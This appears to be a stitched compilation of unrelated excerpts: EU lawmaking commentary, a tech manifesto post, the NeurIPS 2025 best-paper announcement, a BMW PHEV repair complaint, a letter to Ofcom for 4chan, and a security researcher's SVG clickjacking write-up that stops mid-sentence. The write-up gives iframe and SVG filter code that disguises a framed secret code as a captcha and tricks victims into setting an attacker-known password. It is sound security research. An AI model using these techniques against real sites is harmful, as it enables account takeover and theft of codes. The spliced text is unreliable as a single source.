By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.
This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.
The Resonant Computing Manifesto
The Resonant Computing Manifesto. Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.
This part in particular resonates with me:
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations.
The manifesto proposes five principles for building resonant software: keeping data private and under personal stewardship, building software that's dedicated to the user's interests, ensuring plural and distributed control rather than platform monopolies, making tools adaptable to individual context, and designing for prosocial membership of shared spaces.
By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”
The Best Paper Award Committee members were nominated by the Program Chairs and the Datasets and Benchmarks track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and Next Generation and Accessibility Chairs.
The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmark Track of the conference.
With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runner-ups. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.
The winners are presented here in alphabetical order by title.
Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.
Reflections from the Selection Committee
This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.
Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification—applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA)—consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation, attention sink and enhances long-context extrapolation performance. We also release related codes (https://github.com/qiuzh20/gated_attention) and models (https://huggingface.co/QwQZh/gated_attention) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models (https://huggingface.co/collections/Qwen/qwen3-next).
Reflections from the Selection Committee
The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.
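To make the gating modification concrete, here is one plausible reading of “a head-specific sigmoid gate after SDPA” as a formula; the exact parameterization (how the gate projection is defined, and whether the gate is elementwise) is specified in the paper, so treat this only as an illustrative sketch:
o_h = sigmoid(x W_g,h) ⊙ SDPA(q_h, K_h, V_h) for each head h, then y = concat(o_1, ..., o_H) W_o
Here x is the token’s hidden state, ⊙ is elementwise multiplication, and the query-dependent sigmoid gate sparsely modulates each head’s attention output before the usual output projection, which matches the abstract’s description of where the non-linearity and sparsity enter.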
Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2 – 5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach substantially increases the performance of the self-supervised contrastive RL algorithm, outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.
Reflections from the Selection Committee
This paper challenges the conventional assumption that the information provided by reinforcement learning (RL) is insufficient to effectively guide the numerous parameters of deep neural networks, hence suggesting that large AI systems be predominantly trained through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example, for highlighting the important role of batch size scaling for deeper networks within contrastive RL.
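For context on the method being scaled, goal-conditioned contrastive RL in this family generally trains a critic of the form f(s, a, g) = φ(s, a) · ψ(g), using a contrastive loss in which goals actually reached later on the same trajectory act as positives and goals sampled from other trajectories act as negatives; this is a generic description of the approach rather than the paper’s exact objective, and the paper’s contribution is showing that the encoders φ and ψ keep improving as they are made hundreds of layers deep.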
Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time τ_gen at which models begin to generate high-quality samples, and a later time τ_mem beyond which memorization emerges. Crucially, we find that τ_mem increases linearly with the training set size n, while τ_gen remains constant. This creates a growing window of training times between τ_gen and τ_mem where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when n becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which allows memorization to be avoided even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.
Reflections from the Selection Committee
This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales: an early, dataset-independent generalization phase followed by a linear, dataset-size-dependent memorization phase. This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of generalization.
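In symbols, the two regimes described above amount to τ_gen ≈ constant while τ_mem ∝ n, the training set size, so the safe training window τ_gen < t < τ_mem widens linearly as more data is added; the notation follows the abstract’s definitions of the generation and memorization timescales.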
Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at the current state of RLVR by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@k at large k values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does not elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of k (e.g., k = 1), base models achieve higher pass@k scores when k is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models’ sampling distribution, suggesting that their reasoning abilities originate from and are bounded by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model’s reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms—such as continual scaling and multi-turn agent-environment interaction—to unlock this potential.
Reflections from the Selection Committee
This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration, rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and genuinely expand LLM reasoning capabilities.
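Because the argument above hinges on pass@k at large k, it is worth recalling how that metric is typically estimated (this is the standard formulation from the code-generation literature, not necessarily the paper’s exact evaluation script): sample n completions per problem, count the c that are correct, and compute
pass@k = E over problems [ 1 − C(n−c, k) / C(n, k) ]
where C(·, ·) is the binomial coefficient. At k = 1 this is just average accuracy; at large k it asks whether any of many samples solves the problem, which is what probes the outer boundary of a model’s reasoning ability.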
We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class with Littlestone dimension d, the transductive mistake bound is at least Ω(√d). This establishes an exponential improvement over the previous, logarithmic lower bounds due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every d, there exists a class of Littlestone dimension d with transductive mistake bound O(√d). Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advance access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.
Reflections from the Selection Committee
This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.
The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.
The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.
Reflections from the Selection Committee
This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. The authors introduce a controlled “toy model” to examine how superposition and data structure affect the scaling of loss with model size and demonstrate that under strong superposition, where features are overlapping, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.
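For reference, the “Chinchilla scaling laws” mentioned in the abstract are usually written as the parametric fit L(N, D) = E + A/N^α + B/D^β, with N the number of parameters and D the number of training tokens; the paper’s claim, as summarized above, is that in the strong-superposition regime the model-size contribution to the loss falls off inversely with the model’s representation dimension, a behavior the authors find consistent with that fitted form.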
The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.
We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out during the paper’s respective oral sessions by the session chairs.
We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.
Best Paper Award Committee for Main Track and Datasets and Benchmarks Track
Jacob Andreas (MIT, United States)
Sander Dieleman (Google DeepMind, UK)
Dilek Hakkani-Tur (University of Illinois Urbana-Champaign, United States)
Brian Kingsbury (IBM, United States)
Mirella Lapata (University of Edinburgh, Scotland)
Vincent Lepetit (Ecole des Ponts ParisTech, France)
Ulrich Paquet (AIMES & Google DeepMind, Africa)
Violet Peng (UCLA, United States)
Doina Precup (McGill University, Canada)
Masashi Sugiyama (RIKEN & University of Tokyo, Japan)
Vincent Tan (National University of Singapore, Singapore)
Yee Whye Teh (University of Oxford, United Kingdom)
Xing Xie (Microsoft, China)
Luke Zettlemoyer (University of Washington/Meta, United States)
BMW PHEV: When EU engineering becomes a synonym for "unrepairable" (EV Clinic)
2021 > PHEV BMW iBMUCP PHEV Post-Crash Recovery — When EU engineering becomes a synonym for “unrepairable” + “generating waste”.
If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This “safety fuse” is designed to shut the system down the moment any crash event is detected. Sounds safe — but extremely expensive. Theoretically, insurance for a BMW PHEV should be three times higher than for an ICE car or an EV.
Unfortunately, that’s not the only issue.
BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS and internal copper-bonded circuitry, is fully welded shut. There are no screws, no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases the risk of bricked components, which can raise the recovery cost by a factor of 10.
But that is still not the only problem.
Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.
This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (1100€ + tax for faulty fuse)
And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, IMIB, and AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (Even though we managed to activate this one with the IMIB, it will be necessary in some situations.)
Yes, you read that correctly: €25,000.
A lot of vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a misleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates and unnecessary parts-manufacturing cycles, and overcomplicated service procedures, far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating the real ECO footprint of replacement-part manufacturing, unnecessary servicing, and the real cost of waste?
We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.
ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock modules.
Meaning: even in an authorised service centre, the system can accidentally delete the configuration, and the car can end up needing not only a new iBMUCP but also all-new battery modules.
Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, costing €6,000+ VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.
The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.
One more problem: battery erasure can happen in an OEM workshop or in ours or any other third-party workshop, but if the procedure was started in workshop 1, it can’t be continued in workshop 2. If battery damage happens in our workshop during a fuse change and a battery swap is then needed, neither we nor an OEM workshop covers the cost of a completely new battery pack, which heavily increases ownership costs.
All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and the BMS reset is around €50, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety, no benefit to anti-theft protection — the only outcome is the generation of billable labour hours and massive amounts of needless electronic/lithium waste.
Beyond that, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents together with our colleagues from Hungary. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction the EU keeps misleading the public about — since the manufacturers clearly won’t.
Part number: 61 27 8 880 208
Faults:
21F2A8 High voltage battery unit, terminal / high voltage battery safety capsule: defective trigger/control electronics
21F35B High voltage battery unit, voltage and electric current sensor, current: counter for the reuse of cell modules exceeded (safety function)
21F393 High voltage battery unit, fault cumulative: memory of faults that prevent the active transport
3B001D High voltage battery unit, contactor excitation controller circuit breakers: double fault
21F37E Collision detection: collision detected due to ACSM signal
21F04B High voltage battery unit, safety function: reset command units executed
OEM service cost: €4,000 + tax (approx. – if you have a BMW quote, send it)
OEM iBMUCP: €1,100 + tax
Labor hours: 24–50 h
EVC: €2,500 + tax (full service)
It is cheaper to change an LG battery on a Tesla than to change a fuse on a BMW PHEV, and probably with a smaller CO₂ footprint too.
If you want to book your service with EV CLINIC:
Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenija: www.evclinic.si
Serbia: www.evclinic.rs
This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, would prefer to keep secret. See Part 1, Part 2, and Part 3.
We heard from Ofcom again today.
The agency writes:
The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.
Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.
The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).
After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.
Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy, let it be known on GB News, in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.
The GRANITE Act, at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State, turned it into a bill. Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.
The proposal was inspired by your agency’s censorship letters, letters targeting Americans in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.
It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.
4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.
Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.
Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.
I copy the U.S. government and government officials in several states. My client reserves all rights.
Preston Byrne
—
Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.
There is a possible future, in the very near future, where these notices will be utterly impossible for foreign governments to send to American citizens – notices I have been parrying, professionally, for eight years.
America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.
Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.
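For anyone who hasn’t seen it spelled out, the classic version is usually nothing more than a transparent cross-origin iframe stacked over a decoy control, roughly like the sketch below (the URL, coordinates, and labels are placeholder values, not taken from any real attack):
<!-- Decoy button the victim believes they are clicking -->
<button style="position:absolute; top:120px; left:80px;">Play video</button>
<!-- The real target, framed, made fully transparent, and stacked on top
     so the click lands on its sensitive control instead -->
<iframe src="https://victim.example/settings/delete-account"
        style="position:absolute; top:60px; left:20px; width:480px; height:320px;
               opacity:0; z-index:2; border:0;"></iframe>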
I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.
I call this technique “SVG clickjacking”.
Liquid SVGs
The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.
Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had a pretty accurate CSS/SVG recreation of the effect.1
You can drag around the effect with the bottom-right circle control thing in the demo above (chrome/firefox desktop, chrome mobile).
Note: This demo is broken in Safari, sorry.
My little tech demo made quite a splash online, and even resulted in a news article with what is probably the wildest quote about me to date: “Samsung and others have nothing on her”.
A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?
Like, surely not? The way the effect “refracts light”2 is way too complex to work on a cross-origin document.
But, to my surprise, it did.
The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?
This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s all of them, and yes!
Building blocks
I got to work, going through every
<fe*>
SVG element and figuring out which ones can be combined to build our own attack primitives.
These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.
Let’s take a look at some of the more useful base elements we can play with:
<feComposite>
- compositing utilities, can be used to apply an alpha matte, or do various arithmetics on one or two inputs;
<feColorMatrix>
- apply a color matrix, this allows moving colors between channels and converting between alpha and luma mattes;
That’s quite a selection of utilities!
If you’re a demoscener
3
you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.
Fake captcha
I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You
could
ask the user to retype it by itself, but that’d probably seem suspicious.
What we can do instead is make use of
feDisplacementMap
to make the text seem like a captcha! This way, the user is far more likely to retype the code.
Note: Only the part inside the
<filter>
block is relevant, the rest is just an example of using filters.
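To make that concrete, here is a minimal sketch of the idea, with an illustrative target URL and feTurbulence noise standing in for whichever displacement map you would actually use:
<svg width="0" height="0">
  <filter id="captchaify">
    <!-- noise pattern to drive the displacement -->
    <feTurbulence type="fractalNoise" baseFrequency="0.05" numOctaves="2" result="noise"/>
    <!-- push the framed page's pixels around so the code reads like a wobbly captcha -->
    <feDisplacementMap in="SourceGraphic" in2="noise" scale="15" xChannelSelector="R" yChannelSelector="G"/>
  </filter>
</svg>
<!-- illustrative target: any frameable page that displays a secret code -->
<iframe src="https://example.com/magic-code" style="filter: url(#captchaify); border: 0;"></iframe>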
Add to this some color effects and random lines, and you’ve got a pretty convincing captcha!
Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.
Still, it could come in handy because often times you’re allowed to frame read-only API endpoints, so maybe there’s an attack there to discover.
Grey text hiding
The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.
Let’s take a look at our example target (try typing in the box).
Set a new password
too short
In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.
Let’s start off by using feComposite with arithmetics to make the grey text disappear. The arithmetic operation takes in two images, i1 (in=...) and i2 (in2=...), and lets us do per-pixel maths with k1, k2, k3, k4 as the arguments according to this formula:
result = k1·i1·i2 + k2·i1 + k3·i2 + k4
4
Set a new password
too short
<feComposite operator=arithmetic k1=0 k2=4 k3=0 k4=0 />
Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.
It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.
We could play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we’d still have the black text look the way it usually does, just without any grey text. Is that possible?
So here’s where a really cool technique comes into play - masking. We’re going to create a matte to “cut out” the black text and cover up everything else. It’s going to take us quite a few steps to get to the desired result, so let’s go through it bit by bit.
We start off by cropping the result of our black text filter with
feTile
.
Set a new password
too short
<feTile x=20 y=56 width=184 height=22 />
Note: Safari seems to be having some trouble with feTile, so if the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If you're writing an attack for Safari, you can also achieve cropping by making a luma matte with feFlood and then applying it.
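For reference, that Safari fallback might be sketched roughly like this, flooding only the region you want to keep and compositing with it. The coordinates are illustrative and “blacktext” stands in for whichever earlier result you’re cropping; strictly speaking this uses the flood as an alpha matte rather than a luma one, but the crop comes out the same:
<!-- flood only the region we want to keep -->
<feFlood x="20" y="56" width="184" height="22" flood-color="#fff" result="keep"/>
<!-- keep the earlier result's pixels only where the flood exists -->
<feComposite operator="in" in="blacktext" in2="keep"/>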
Then we use
feMorphology
to increase the thickness of the text.
Set a new password
too short
<feMorphology operator=erode radius=3 result=thick />
Now we have to increase the contrast of the mask. I’m going to do it by first using
feFlood
to create a solid white image, which we can then
feBlend
with
difference
to invert our mask. And then we can use
feComposite
to multiply
5
the mask for better contrast.
We have a luma matte now! All that’s left is to convert it into an alpha matte with feColorMatrix, apply it to the source image with feComposite, and make the background white with feBlend.
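Assembled, that tail end of the chain could look something like this (a sketch, not the demo’s exact filter; it assumes the thick result from the feMorphology step above and picks the multiply and matrix values freely):
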